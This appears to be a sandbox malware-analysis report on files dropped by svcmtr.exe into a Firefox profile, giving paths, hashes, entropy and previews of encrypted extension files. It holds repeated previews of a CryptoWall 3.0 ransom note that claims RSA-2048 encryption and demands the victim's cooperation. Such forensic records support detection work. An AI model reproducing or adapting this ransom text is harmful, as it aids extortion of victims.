                                                                                                                          SHA-512:23966D1F07DC3D0DDE30592762178EF8C373F5ECC12AFF0FC78B8497E93C5BBA604F84896E8A730E493DD670B56E7D222B11CC924C363750D61CDEB443B3A42D
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264...n......[*.PL. ......e.x... .......w.2.s..\..p..T..t.E.L.i7.;F...*.'../....F<.V.....g.l_g........L..L....@2.....'x.....Y./u:...u.T..j.C..*....;P...(.P........2.w..."...S.......<....Y.H.k......$.q`S&.......e>&i..sYi..A.$......W.@.Q.D.`........}....;E.g.._.x.M....H]!9....<&5..._H.....kdt1....`u..]...a.........3..e8..a.g.RK&....ui.9.......r..P)...A3.9..$2%.w(s. :...m].w.Z%f*.?xj.......O.~{....^.UA8..[..JJ.Txc|BG...j`....(...b......a......F.\....Q.....T%..=.....2b.......q.Ur?%r.,...3A.....`D.O}.a...."...Gl..G?..J..6......{.y..5..o.b..r...7wZI...*.h......zr..

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\lib\storage-manager.js

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1246
                                                                                                                          Entropy (8bit):7.567557577813457
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:c+z5U4a8OoDUX+S2rF8frayappbN8WeTt/T9CbjnIFmxSlFvvUkmSsrW:c+9U40oDgjGyappbNwTt/GnE02FvvUkX
                                                                                                                          MD5:CA33303BA0FB6CBFF7499FF620601D29
                                                                                                                          SHA1:4C8A461E63226AEBB5A1C86EE1D7EA250827FC84
                                                                                                                          SHA-256:D3AD4F537428C52B34FDBBD80158891E9096C9E4E3315CED568B5B035F27D6C7
                                                                                                                          SHA-512:CE51DB71656900E25251E5F1CFC5CC7DE02383597F71A7A3304A246E74FA7D7026EA61E93718A21AFF1560BD6E78A734C4503459EE5653DC2469C2F2793C2952
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..[..T2#u. ..mM.m3......j......?88].].N...d..8u8%....OO.....;...6..TQ..0...?4..E..-.6.....l9.|...."..}....$....u.C.._6^_...y..$..9\..w.A..I.+<......# G..a...f.....JD`.CK.A.K...+ct7.A.....h;..g....'[....<...U.O..z.Y(..iy...x.?IQb...R.`!{....QV.....t5;yI...i,..}.....!..!......Iel$....0...f......\..i.0...j..o.......B.ky.O......M..L...P....lz.....b...&....<\.....=.o.f..G.'.....5.v,X=...........5{...%$...t?..f1.M.s..k.F#lo.-....n:..T40O..........u.........$..-.>.......a..~@..s\.......6]{._jVw.%.,h..l..q.g..-.?y..):..i=n]}...$..ELc..Z...6.he..un....?:^.g.W..D_.N..).~.".....=L..E

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\lib\tokens-manager.js

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1470
                                                                                                                          Entropy (8bit):7.652145716933632
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:c+z5U4a8OoDUX+S2S9kp1VwQ6P/u63t7amnWU96O5VL6aADTn8+zYaYiXRIMKID:c+9U40oDgB9kpS/RsmWU962kTTnj0aYU
                                                                                                                          MD5:6B925A5D3CD2C217CB1BD1153646A8D1
                                                                                                                          SHA1:4DDBD171B549C5447519FDA1321B715BC456F432
                                                                                                                          SHA-256:B9DB27FF938AD6C94096FBA4D7380A1EEC4824214D52C668DDF03E54FAFF28C4
                                                                                                                          SHA-512:90297ADAEB1DE8918A5F0452CD247E05CEC709543B3F05DCD5D6A23F871E5BF5D5CBF0DE97E12B6A11042AEE6466848759E5853F53ECD634EE07BEE2649B6512
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264...........5..@........W.\d/...DJ>.....Z.~_..]tf/....X.;.S.e_^.p.%jN...kI..3Z......P.h..Z...A...w.....+U..y&.../.....o.c...7..:..^..PF}.{..*...h.......7.....]K.e.+LF@.....(...e9..........>9==z.,.".....3.B4%.g.....&b.. .h...]}s.O.j...'...S.U=.R..j.m[...PS5.H.)...Jun._l:...lQ......b.V`.C..;!PX._...yZ..@.,b8&.l...)[.'O....@..l......Z....2..d.`j.S?.c*...5...#.+.....6..g.f...Ky.]q..J..R@0#.]:#J.....$D..(..].A..w.Vw..4.F..#D.?K.Jw..08..8..<A...&m.).....Kg`x{..k...Q.uo.^..).j.A..6\.H.....;v..P...)...o.....{...7[(gk.+g.CPor...>P^/....f.[..&st..+........*`z.\...*.#.m.....HZ..%..vr....

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\lib\toolbar-button.js

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3310
                                                                                                                          Entropy (8bit):7.902166789786186
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:cztoDZXPZq4AY5YfmWAHKI8Z7jnJGxfrt5QMNm1:Go9Q4T5vW8KzrJGFQMNi
                                                                                                                          MD5:CC7EBB14A12074EE97EF968D9EA3EB8A
                                                                                                                          SHA1:6A6CBBA5A902D6095777A6C5C7F03C5D7859EC75
                                                                                                                          SHA-256:E4EFECD5CDF34C89907407F97A69618363DCFF455764571E5F966A98DD69505A
                                                                                                                          SHA-512:8E4C314C425D5BA43DD020379581677C9401273C6678BEFB0619F368F4536A5A31AD9CFB8DE0F8731F5C09D763B90C33FD5CF22934D9C434E65E7199C6E8FDDA
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264...47.(.}....7.W.G......YE.W..".M...w.5....{...6h. ....I.$}A.}s....i...d..Yw.U%.A.....H.aS..,..Pel...k1.H..p%......{..k...)...P.d...!..S.d..|..^.,5..F.F...8....u..q.B"..m.........#.....O8[%7.....f..-...j_.......,tfE...&.1N.Q.....e...\..zI=Z...-.......~[Co..D.x..E..P<..<......Y..Q.)......I..5.O...e.6@.......X...#G\X.(5i...X..I...........".rE....0$.7.L..-G........"....1.S.Q..s>Vh......p.K.T..j7N.....s.wK...Vf....*..UQ.S...~.P.`.d....'...N.u6.V..*/1....F...bt...(,.....W...+<.."..l...=.......|...C.....(G...l.F..$.%M...c.....9.v.....U`4....^I.bV-....D`..;....r7W.U.*l.F...

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\lib\utils.js

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):6926
                                                                                                                          Entropy (8bit):7.961489942903021
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:GoMqsyyjDjky1mvi87DbAumlPIQ04P9jbIwMR:GnyyPj9mDDpmRt9jb9s
                                                                                                                          MD5:81D4663E21BC9FE9FD3C6D7AA3089E19
                                                                                                                          SHA1:CDB4A73800E5CE68C25CE5E8D439DD338579CDF5
                                                                                                                          SHA-256:4DC47B5A1B74D5AC76A60012EBF7AA9554EB820DF253452C1406CD79E6374543
                                                                                                                          SHA-512:0D095DFE806C95226A87F5D0F2A9EE6A3D919E5AD7DA22227666A6CCDE37BADF288FDC730A8A42A1EA995022F8FCB6EA8D585A28E246E6F496F53D9B33E4C422
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..#,.......6..g..(`....SOL....I...V........,...k?kWR'..w....M.5....\..O...Z..jO...+.v\.G#.....17#.0j?-.O:<..\.......V :A.s.d.;.hs......*S:.......c.z..M...Y_..MJ..qY;E..K...J4...[.._..l...7o8b...C..\..3..........lc.Z..uP:...sc'<.8a.\L...j.:..ym7h....*8.;.._jo..>Zi...<.z;.EM..>w.Z5....,H.s.6...I.^.\...f.>i...H.Nc....z .@;....egJ./EW+......j.R...0..^.yi..p.(jS.....S.l0Z..&.XT.e@o..`..c.\..?#.K.9J\SU..."p...R]{qc..,.Kc.0...O.n......_o.[..<..K...#.].8\. W.....%..h..p..k..6 ]S'...8K.+s.E{N'`n'.v.....7.R.7....P.y..r..,cK5...=...l...7.. q...{..[.'6...1K........|...;).).c*D.A6....

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\locale\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\locale\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\gmp\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\gmp\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\jetpack\@all-aboard-v1-6\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\jetpack\@all-aboard-v1-6\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
